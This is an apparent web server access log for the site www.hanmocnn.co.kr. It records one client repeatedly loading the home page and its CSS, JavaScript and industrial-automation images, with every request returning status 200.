"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:31:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:31:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:31:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:31:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:31:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:31:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:31:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:31:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:31:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:31:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:31:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:31:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10399] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:43:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:43:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10410] [Gzip 5.46] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:45:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:45:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:45:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:45:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10404] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:46:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:46:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10404] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20971] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:05 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10404] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20960] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:48:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 